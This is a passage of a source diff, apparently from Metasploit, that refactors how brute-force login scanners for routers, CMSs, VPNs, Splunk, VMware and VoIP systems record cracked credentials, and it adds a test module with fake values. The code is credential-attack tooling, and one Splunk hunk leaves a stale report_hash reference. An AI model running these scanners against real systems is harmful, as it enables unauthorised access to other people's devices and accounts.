       if res and res.get_cookies.include?('authenticated=')
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'Cisco IronPort Appliance',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'
-        }
-
-        report_auth_info(report_hash)
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
index 415bb3e299..5f14f63e63 100644
--- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
@@ -157,6 +157,33 @@ class Metasploit3 < Msf::Auxiliary
           )
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'Cisco SSL VPN',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   # Brute-force the login page
   def do_login(user, pass, group)
     vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
@@ -197,18 +224,7 @@ class Metasploit3 < Msf::Auxiliary
 
         do_logout(resp.get_cookies)
 
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'Cisco SSL VPN',
-          :user   => user,
-          :pass   => pass,
-          :group => group,
-          :active => true,
-          :type => 'password'
-        }
-
-        report_auth_info(report_hash)
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
index 9c6d48cdb6..64c56ad076 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
@@ -82,6 +82,32 @@ class Metasploit3 < Msf::Auxiliary
     }
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   # default to user=admin without password (default on most dlink routers)
   def do_login(user='admin', pass='')
     vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
@@ -91,16 +117,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
-
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname => (ssl ? 'https' : 'http'),
-        :user   => user,
-        :pass   => pass,
-        :proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
-        :active => true
-      )
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
 
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
index d9d3972ba8..b710443945 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -101,15 +101,7 @@ class Metasploit3 < Msf::Auxiliary
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
 
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname => (ssl ? 'https' : 'http'),
-        :user   => user,
-        :pass   => pass,
-        :proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
-        :active => true
-      )
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
 
       return :next_user
     else
@@ -118,6 +110,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_http_login(user,pass)
     begin
       response = send_request_cgi({
diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
index 30953b0a20..b74c903976 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
@@ -83,6 +83,32 @@ class Metasploit3 < Msf::Auxiliary
     }
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   # default to user=admin without password (default on most dlink routers)
   def do_login(user='admin', pass='')
     vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
@@ -93,15 +119,7 @@ class Metasploit3 < Msf::Auxiliary
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
 
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname => (ssl ? 'https' : 'http'),
-        :user   => user,
-        :pass   => pass,
-        :proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
-        :active => true
-      )
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
 
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index c4a35015b7..5ba4d5a225 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -56,6 +56,32 @@ class Metasploit3 < Msf::Auxiliary
     return id, token
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user, pass)
     #
     # Get a new session ID/token.  That way if we get a successful login,
@@ -99,15 +125,7 @@ class Metasploit3 < Msf::Auxiliary
     location = res.headers['Location']
     if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
       print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
-      report_auth_info({
-        :host        => rhost,
-        :port        => rport,
-        :sname       => (ssl ? 'https' : 'http'),
-        :user        => user,
-        :pass        => pass,
-        :proof       => location,
-        :source_type => 'user_supplied'
-      })
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
       return :next_user
     else
       vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index 0192a19d5e..daba1a4646 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -63,6 +63,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     # Check if remote host is available or appears vulnerable
     unless check_host(ip) == Exploit::CheckCode::Appears
diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb
index 78ced007d5..169c17cefd 100644
--- a/modules/auxiliary/scanner/http/ektron_cms400net.rb
+++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb
@@ -124,6 +124,32 @@ class Metasploit3 < Msf::Auxiliary
       end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user=nil, pass=nil, viewstate_arg=viewstate, eventvalidation_arg=eventvalidation)
     vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")
 
@@ -141,17 +167,7 @@ class Metasploit3 < Msf::Auxiliary
 
       if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
         print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host         => rhost,
-          :port         => rport,
-          :sname => (ssl ? 'https' : 'http'),
-          :user         => user,
-          :pass         => pass,
-          :proof        => "WEBAPP=\"Ektron CMS400.NET\", VHOST=#{vhost}",
-          :source_type  => "user_supplied",
-          :duplicate_ok => true,
-          :active       => true
-        )
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
 
       elsif(res and res.code == 200)
         vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
index bbf067d4df..0939f53a09 100644
--- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb
+++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
@@ -66,6 +66,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -87,16 +113,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD")
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-      report_hash = {
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'EtherPAD Duo Portal',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'
-      }
-      report_auth_info(report_hash)
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
       return :next_user
     else
       vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb
index 23464d6934..2278d40260 100644
--- a/modules/auxiliary/scanner/http/infovista_enum.rb
+++ b/modules/auxiliary/scanner/http/infovista_enum.rb
@@ -79,6 +79,32 @@ class Metasploit3 < Msf::Auxiliary
     do_login(user, pass)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'InfoVista VistaPortal',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -100,18 +126,7 @@ class Metasploit3 < Msf::Auxiliary
         vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
       else
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'InfoVista VistaPortal',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'
-        }
-
-        report_auth_info(report_hash)
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
         return :next_user
       end
 
diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
index 78dd94c00d..6fee0a5043 100644
--- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
+++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
@@ -109,6 +109,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user, pass)
     vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
     response  = do_web_login(user, pass)
@@ -116,18 +142,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
-      report_auth_info(
-        :host         => rhost,
-        :port         => rport,
-        :sname        => (ssl ? 'https' : 'http'),
-        :user         => user,
-        :pass         => pass,
-        :proof        => target_url,
-        :type         => 'passsword',
-        :source_type  => 'cred',
-        :duplicate_ok => true,
-        :active       => true
-      )
+      report_cred(ip: rhost, port: rport, user: user, password: pass)
       return :abort if datastore['STOP_ON_SUCCESS']
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb
index bb72666909..9a3349e800 100644
--- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb
+++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb
@@ -77,6 +77,31 @@ class Metasploit3 < Msf::Auxiliary
     return creds.split(":")
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'novellmdm',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     print_status("Verifying that Zenworks login page exists at #{ip}")
     uri = normalize_uri(target_uri.path)
@@ -97,14 +122,7 @@ class Metasploit3 < Msf::Auxiliary
         print_good("Got creds. Login:#{user} Password:#{pass}")
         print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
 
-        report_auth_info(
-          :host => ip,
-          :port => rport,
-          :sname => "novellmdm",
-          :user => user,
-          :pass => pass,
-          :active => true
-        )
+        report_cred(ip: ip, port: rport, user: user, password: pass)
       else
         print_error("Zenworks MDM does not appear to be running at #{ip}")
         return :abort
diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb
index 57a569b075..d4db7b12de 100644
--- a/modules/auxiliary/scanner/http/splunk_web_login.rb
+++ b/modules/auxiliary/scanner/http/splunk_web_login.rb
@@ -127,6 +127,31 @@ class Metasploit3 < Msf::Auxiliary
     return (res and res.body =~ /Logged in as (.+)/) ? false : true
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'splunk-web',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
 
   #
   # Brute-force the login page
@@ -165,15 +190,8 @@ class Metasploit3 < Msf::Auxiliary
       end
 
       print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
+      report_cred(ip: datastore['RHOST'], port: datastore['RPORT'], user:user, password: pass)
 
-      report_hash = {
-        :host   => datastore['RHOST'],
-        :port   => datastore['RPORT'],
-        :sname  => 'splunk-web',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'}
 
       report_auth_info(report_hash)
       return :next_user
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index 1c7b103f57..03fa58ab3f 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -50,6 +50,32 @@ class Metasploit3 < Msf::Auxiliary
     return id
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user, pass)
     begin
       sid = get_sid
@@ -93,15 +119,7 @@ class Metasploit3 < Msf::Auxiliary
         vprint_status("#{peer} - Username found: #{user}")
       when /\<a href="process\.php\?logout=1"\>/
         print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
-        report_auth_info({
-          :host        => rhost,
-          :port        => rport,
-          :sname       => (ssl ? 'https' : 'http'),
-          :user        => user,
-          :pass        => pass,
-          :proof       => "logout=1",
-          :source_type => 'user_supplied'
-        })
+        report_cred(ip: rhost, port: rport, user:user, password: pass)
         return :next_user
       end
     end
diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
index bd8b924ac0..b08d53cd3f 100644
--- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
+++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
@@ -130,6 +130,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'cctv_dvr',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user=nil, pass=nil)
     vprint_status("#{rhost} - Trying username:'#{user}' with password:'#{pass}'")
 
@@ -179,16 +205,7 @@ class Metasploit3 < Msf::Auxiliary
 
       # Report valid credentials under the CCTV DVR admin port (5920/TCP).
       # This is a proprietary protocol.
-      report_auth_info(
-        :host         => rhost,
-        :port         => rport,
-        :sname        => 'cctv_dvr',
-        :user         => user,
-        :pass         => pass,
-        :source_type  => "user_supplied",
-        :duplicate_ok => false,
-        :active       => true
-      )
+      report_cred(ip: rhost, port: rport, user:user, password: pass)
 
       @valid_hosts << rhost
       return :next_user
diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
index 29eb4d13db..210a41b647 100644
--- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
@@ -58,6 +58,31 @@ class Metasploit3 < Msf::Auxiliary
     return so_version << "  " << product
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'telnet',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
 
   def run_host(ip)
     to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
@@ -70,16 +95,7 @@ class Metasploit3 < Msf::Auxiliary
           mac  = banner_santized.match(/((?:[0-9a-f]{2}[-]){5}[0-9a-f]{2})/i)[0]
           password = mac_to_password(mac)
           info = get_info(banner_santized)
-          report_auth_info(
-            :host  => rhost,
-            :port => rport,
-            :sname => 'telnet',
-            :user => 'factory',
-            :pass => password,
-            :source_type => "user_supplied",
-            :proof => info,
-            :active => true
-          )
+          report_cred(ip: rhost, port: rport, user:'factory', password: password)
           break
         else
           print_status("It doesn't seem to be a RuggedCom service.")
diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
index ea5d2b3e7f..214dc66eed 100644
--- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
@@ -37,6 +37,31 @@ class Metasploit3 < Msf::Auxiliary
     register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),])
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'vmware',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
 
   def run_host(ip)
     return unless is_vmware?
@@ -45,14 +70,7 @@ class Metasploit3 < Msf::Auxiliary
       case result
       when :success
         print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"
-        report_auth_info(
-          :host   => rhost,
-          :port   => rport,
-          :user   => user,
-          :pass   => pass,
-          :source_type => "user_supplied",
-          :active => true
-        )
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
         return if datastore['STOP_ON_SUCCESS']
       when :fail
         print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"
diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb
index db802dda84..147a417d1a 100644
--- a/modules/auxiliary/voip/asterisk_login.rb
+++ b/modules/auxiliary/voip/asterisk_login.rb
@@ -51,6 +51,32 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'asterisk_manager',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     print_status("Initializing module...")
     begin
@@ -91,15 +117,7 @@ class Metasploit3 < Msf::Auxiliary
         send_manager(cmd)
         if /Response: Success/.match(@result)
           print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
-          report_auth_info(
-            :host   => rhost,
-            :port   => rport,
-            :sname  => 'asterisk_manager',
-            :user   => user,
-            :pass   => pass,
-            :active => true,
-            :update => :unique_data
-          )
+          report_cred(ip: rhost, port: rport, user: user, password: pass)
           disconnect
           return :next_user
         else
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
new file mode 100644
index 0000000000..3044a2d06e
--- /dev/null
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  FAKE_IP   = '192.168.12.123'
+  FAKE_PORT = 80
+  FAKE_USER = 'username'
+  FAKE_PASS = 'password'
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "report_cred test",
+      'Description'    => %q{
+      	This module will test every auxiliary module's report_cred method
+      },
+      'Author'         => [ 'sinn3r' ],
+      'License'        => MSF_LICENSE
+    ))
+  end
+
+  def test_novell_mdm_creds
+    mod = framework.auxiliary.create('scanner/http/novell_mdm_creds')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_joomla_bruteforce_login
+    mod = framework.auxiliary.create('scanner/http/joomla_bruteforce_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_infovista_enum
+    mod = framework.auxiliary.create('scanner/http/infovista_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_etherpad_duo_login
+    mod = framework.auxiliary.create('scanner/http/etherpad_duo_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_ektron_cms400net
+    mod = framework.auxiliary.create('scanner/http/ektron_cms400net')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_drupal_views_user_enum
+    mod = framework.auxiliary.create('scanner/http/drupal_views_user_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_dolibarr_login
+    mod = framework.auxiliary.create('scanner/http/dolibarr_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_dlink_dir_session_cgi_http_login
+    mod = framework.auxiliary.create('scanner/http/dlink_dir_session_cgi_http_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_dlink_dir_615h_http_login
+    mod = framework.auxiliary.create('scanner/http/dlink_dir_615h_http_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_dlink_dir_300_615_http_login
+    mod = framework.auxiliary.create('scanner/http/dlink_dir_300_615_http_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
